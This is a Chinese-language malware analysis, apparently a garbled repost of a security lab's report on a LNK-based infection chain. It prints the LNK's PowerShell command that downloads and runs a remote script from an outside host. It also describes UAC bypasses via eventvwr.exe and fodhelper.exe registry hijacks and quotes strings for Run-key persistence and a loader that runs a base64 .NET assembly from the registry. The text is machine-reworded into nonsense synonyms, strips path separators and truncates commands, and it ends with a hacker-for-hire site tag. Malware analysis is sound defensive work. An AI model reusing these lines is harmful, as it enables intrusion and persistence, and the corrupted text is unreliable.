几天前，Cybaze-Yoroi ZLab安全团队遇到了一类风趣的感染链，它运用多种杂乱技能，能够绕过传统安全防御机制并躲藏其payload，对方针用户形成严重威胁。
整个感染链始于一个LNK文件，运用LNK文件进行进犯是APT安排常常运用的技能之一，因而咱们决议对这些歹意样本进行更深化的研讨，在研讨进程中，咱们还发现了另一个早被用滥的开源项目，许多时分， *** 犯罪分子会在其间植入歹意软件。

技能剖析
感染链的来源是一个简略的LNK文件，旨在经过以下指令从长途方位下载并运转名为“rdp.ps1”的PowerShell文件：
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy Bypass -Windo 1 $wm=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWVY'));sal g $wm;$IF=((New-Object Net.WebClient)).DownloadString('https://hacks4all[.net/rdp.ps1');g $I
检索到的Powershell脚本是整个感染链的dropper。

此Powershell脚本首要运用“Get-WmiObject -Class Win32_OperatingSystem | Select-Object -ExpandProperty Version”指令检索方针核算机上装置的Windows操作系统的版别。接着依据回来的值，运用一些相应的权限提高缝隙，以绕过UAC（用户帐户操控）功用——这是自Windows Vista起引进的一种安全机制，能够防止未经授权的系统配置更改。脚本的首要方针就是在版别低于8.1的Windows中，运用EventViewer进程上的规划缺点来履行具有更高特权的指令。
对此缝隙的运用进程是十分简单的：歹意软件能够拜访注册表项“HKCU： Software Classes mscfile shell open command”，并在此处刺进指令，经过强制履行“eventvwr.exe”进程来运转其payload，因为安全缝隙，能够以更高权限运转该进程。


图1：查看方针Windows版别并为eventvwr.exe进程缝隙运用做准备
第二个缝隙则涉及到Windows 10操作系统：是FODhelper进程中的一个缝隙。此缝隙运用的原理与前一个相似，但拜访的注册表项是“HKCU： Software Classes ms-settings Shell Open command”，而受进犯的进程则是“fodhelper.exe”。


图2:查看方针Windows版别并为fodhelper.exe进程缝隙运用做准备
之后运转Powershell payload，payload在解码后会调用额定的JavaScript代码。这个脚本的主体包括一个嵌入其他子函数的专一匿名函数和一个很大的含糊变量。

图3:以Base64格局编码的payload，与自定义子程序混杂

图4:子程序去混杂后的部分代码
它的payload是一个参数化的Powershell脚本，意图是将终究payload装置到用户注册表hive中，然后完毕感染链。
[
 "Wscript.Shell",
 "scriptfullname",
 "scriptname",
 "powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command ",
 "%",
 "ExpandEnvironmentStrings",
 "Temp",
 "",
 "fromCharCode",
 "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('Temp')+'",
 "',[System.IO.File]::ReadAllText('",
 "'));wscript '",
 "'",
 "Run",
 "Quit",
 "New-ItemProperty -Path 'HKCU:SoftwareMicrosoftWindowsCurrentVersionRun' -name 'FileName' -value '",
 "' -PropertyType String -Force;",
 "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'",
 "'))",
 
 " ##### FINAL PAYLOAD ##### "
 "HKCUSOFTWAREMicrosoft\Winkey",
 "Scripting.FileSystemObject",
 "REG_SZ",
 "regwrite",
 "$_b = (get-itemproperty -path 'HKCU:SOFTWAREMicrosoft' -name 'Winkey').Winkey;$_b=$_b.replace('~','0');[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"

[1] [2]  黑客接单网